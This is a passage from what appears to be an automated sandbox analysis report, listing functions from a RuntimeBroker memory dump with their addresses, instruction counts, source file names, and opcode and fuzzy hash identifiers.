                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a2bf9d0049d87ef4f702bdb14fab9be1bf84461f432f2f672e4f8b8d6302f060
                                                                                                      • Instruction ID: bc67c08a7ef19457be86701c817213fbad990ce57cbf955a30ec37cb368087f7
                                                                                                      • Opcode Fuzzy Hash: a2bf9d0049d87ef4f702bdb14fab9be1bf84461f432f2f672e4f8b8d6302f060
                                                                                                      • Instruction Fuzzy Hash: 08F0F431A1E79D4FDB50DF54A8202E977A1FB45310F0204BBD008D31A1CA7899148B82
                                                                                                      Function 00007FFD9B9B0738 Relevance: .0, Instructions: 46COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f4aeec612e9148a85d3d069567fd232ea59ee09660860f7e70072bb7623baf30
                                                                                                      • Instruction ID: c7ea0f493dc6a108dc3ea6fdbdba0bac849ea333db8e91697049dbb3c2a37ade
                                                                                                      • Opcode Fuzzy Hash: f4aeec612e9148a85d3d069567fd232ea59ee09660860f7e70072bb7623baf30
                                                                                                      • Instruction Fuzzy Hash: C1F0D131E1491E4ADB50ABA898195FE77E0FF18304F000137E419D3299DF34694047C1
                                                                                                      Function 00007FFD9B9B1431 Relevance: .0, Instructions: 43COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 67f38d43113d0ad1c9f291f88e807b965776707dce04af40e0a07b856c3f6dbd
                                                                                                      • Instruction ID: 3229059c778de78ca8130e3b7d1efa0a668979dc0f99787fdc37f220ac290910
                                                                                                      • Opcode Fuzzy Hash: 67f38d43113d0ad1c9f291f88e807b965776707dce04af40e0a07b856c3f6dbd
                                                                                                      • Instruction Fuzzy Hash: C8014900F2F2AE0BFB6977B408B62B82B81AF95304F5A00F9D04E871FBDE1C69418741
                                                                                                      Function 00007FFD9B9BE3A1 Relevance: .0, Instructions: 41COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: de6da0b28d7d28f256fc84fb149e8615ccd4e3906beafaf05e4a0f51a91ce6f0
                                                                                                      • Instruction ID: 743e958a560aac0fcfa31fcfe24b9899746085a2420f53b2437e1333a7042046
                                                                                                      • Opcode Fuzzy Hash: de6da0b28d7d28f256fc84fb149e8615ccd4e3906beafaf05e4a0f51a91ce6f0
                                                                                                      • Instruction Fuzzy Hash: 2AF02B72A4D64E8FDB549F6494521D83BE1FF64340F4101B6E00CC2191D73896558BC1
                                                                                                      Function 00007FFD9B9BC518 Relevance: .0, Instructions: 37COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 24b73e0201b252fdd74489da33ceb8d407c51eb40be82589d6b30ead56a38c6e
                                                                                                      • Instruction ID: c993e9384ae56473e8e8d27fb4b00c12b7b9e4dd5be8c18e10170acaee2631cc
                                                                                                      • Opcode Fuzzy Hash: 24b73e0201b252fdd74489da33ceb8d407c51eb40be82589d6b30ead56a38c6e
                                                                                                      • Instruction Fuzzy Hash: FEF02432B0AA5E9BEB94BEA864625E93390EF14304F000576F06EC10D2DA38A2548B81
                                                                                                      Function 00007FFD9B9BCCC0 Relevance: .0, Instructions: 36COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a17ed846752c70183b554c7e8b431dc7bc4a3c47592754044d8178bce9e56427
                                                                                                      • Instruction ID: 42a6f7eb9c068beb178fed2c4b53c4db693e57409f97766c341f1a524242dd62
                                                                                                      • Opcode Fuzzy Hash: a17ed846752c70183b554c7e8b431dc7bc4a3c47592754044d8178bce9e56427
                                                                                                      • Instruction Fuzzy Hash: 7DF06D30E1851C8FCB58DE54C491AF8B3F1EB98304F0001AED04EE3250CE719A808B45
                                                                                                      Function 00007FFD9B9BFEEC Relevance: .0, Instructions: 32COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d77e67522f0006e6807b63e95b71d38c5af7c80928ca8af058bb173bfc2d73c7
                                                                                                      • Instruction ID: 8d84dd6d4df5c1ac3f2babbd6aa2d7f547ceba4b94c2ee6e623ac7d1edd3f4b7
                                                                                                      • Opcode Fuzzy Hash: d77e67522f0006e6807b63e95b71d38c5af7c80928ca8af058bb173bfc2d73c7
                                                                                                      • Instruction Fuzzy Hash: 16E06831D28E6C5BDB609B98F8107D4BBA0FF8B308F01006AF44CC32A0D7311609C741
                                                                                                      Function 00007FFD9B9B1328 Relevance: .0, Instructions: 32COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9f2bbc248c95a274c0c8110033f61d45943b0824ac2b5da4ecae3cc7a5b8fe8f
                                                                                                      • Instruction ID: 5c30c438bda1991acd4a4c51407c423624e2195f9c487da73614137220d42e34
                                                                                                      • Opcode Fuzzy Hash: 9f2bbc248c95a274c0c8110033f61d45943b0824ac2b5da4ecae3cc7a5b8fe8f
                                                                                                      • Instruction Fuzzy Hash: 07F0F432F2D03AAFE335EBA88461A7833A1AF95314F110234D01DC75E6EE28B5418B80
                                                                                                      Function 00007FFD9B9B21DB Relevance: .0, Instructions: 28COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1bccecf5437f41b6a0cab56faeb71ceb28653c0553a3b57a4e4123c739eef1ee
                                                                                                      • Instruction ID: d77d98d537d6f7772d5ea2e83dbd8434c635bd9cb2d27739a6ec98a515a04ae2
                                                                                                      • Opcode Fuzzy Hash: 1bccecf5437f41b6a0cab56faeb71ceb28653c0553a3b57a4e4123c739eef1ee
                                                                                                      • Instruction Fuzzy Hash: 5DE0CD3154A51C5FD760BB55A8054E37BA8FB42365B00012EF11DC2151D6379512C790
                                                                                                      Function 00007FFD9B9B1284 Relevance: .0, Instructions: 26COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a8acb7315c924f567a4fd0f0cc1202eb1fd1a6d1f6647eda8de7e9792ad77c0b
                                                                                                      • Instruction ID: 77862b5ede97b42cae136bcdafa554cbcb841f7ed614a5bdee15c415f2180180
                                                                                                      • Opcode Fuzzy Hash: a8acb7315c924f567a4fd0f0cc1202eb1fd1a6d1f6647eda8de7e9792ad77c0b
                                                                                                      • Instruction Fuzzy Hash: 12D01201C6E2DB1AE71B23B90D665947F508E531A0B8A0292D454C64E3DC8D259A8672
                                                                                                      Function 00007FFD9B9B1141 Relevance: .0, Instructions: 26COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 316a114e3f9d2e7fc6b39ae8f4a71270fb2a42c76a64f538afd3f0fe1d4a8ec4
                                                                                                      • Instruction ID: fcb5b7946840ded4aa0f3f8fb3c1550210638d3af250a429f72e33edde9b78ba
                                                                                                      • Opcode Fuzzy Hash: 316a114e3f9d2e7fc6b39ae8f4a71270fb2a42c76a64f538afd3f0fe1d4a8ec4
                                                                                                      • Instruction Fuzzy Hash: 76E0C232C6A3CC8FE7525FB058221DA7F24EF52200F4606CBF408C70A2E620A6188793
                                                                                                      Function 00007FFD9B9B9C7C Relevance: .0, Instructions: 24COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f55d3a165f0adc108a29571d2fec87776212968dc6ca401cc5d18b73d9750fc7
                                                                                                      • Instruction ID: b7b6a9424431e9acb3305adc2f542acbe935abda0ceebdbe70d2609027ad10a9
                                                                                                      • Opcode Fuzzy Hash: f55d3a165f0adc108a29571d2fec87776212968dc6ca401cc5d18b73d9750fc7
                                                                                                      • Instruction Fuzzy Hash: 8DE0D83293F5AD1FDF619BBC141D0A9BF50FF11300B440579D01E8B0A1D92912148781
                                                                                                      Function 00007FFD9B9B9CA5 Relevance: .0, Instructions: 23COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 60a2d8eaf2d9c4069f65a49dded2245233986736d2d801e68914f5a8d7b4870d
                                                                                                      • Instruction ID: a86c6816201ca3df867ed28e70e7447f686584f96c998f82a40a4f52a02d080e
                                                                                                      • Opcode Fuzzy Hash: 60a2d8eaf2d9c4069f65a49dded2245233986736d2d801e68914f5a8d7b4870d
                                                                                                      • Instruction Fuzzy Hash: 52E0C27084E3CD5FCB23ABB458210D87F70FE12200B8A05DBE498C7063D66D4229C783
                                                                                                      Function 00007FFD9B9B0795 Relevance: .0, Instructions: 10COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: afd9b799a6f7d29090af23f970e660a538e8e7c8adbe7481c7dba59862b8c9cb
                                                                                                      • Instruction ID: 2c3217a25f3ab6d3079b1e09960d2594d623b510bf473d54323f013b61d414e1
                                                                                                      • Opcode Fuzzy Hash: afd9b799a6f7d29090af23f970e660a538e8e7c8adbe7481c7dba59862b8c9cb
                                                                                                      • Instruction Fuzzy Hash: 73B09200F7B45A28D42432BA0DAA0BCBB219B8A220FD604B0D48D400A6D84D56A65A82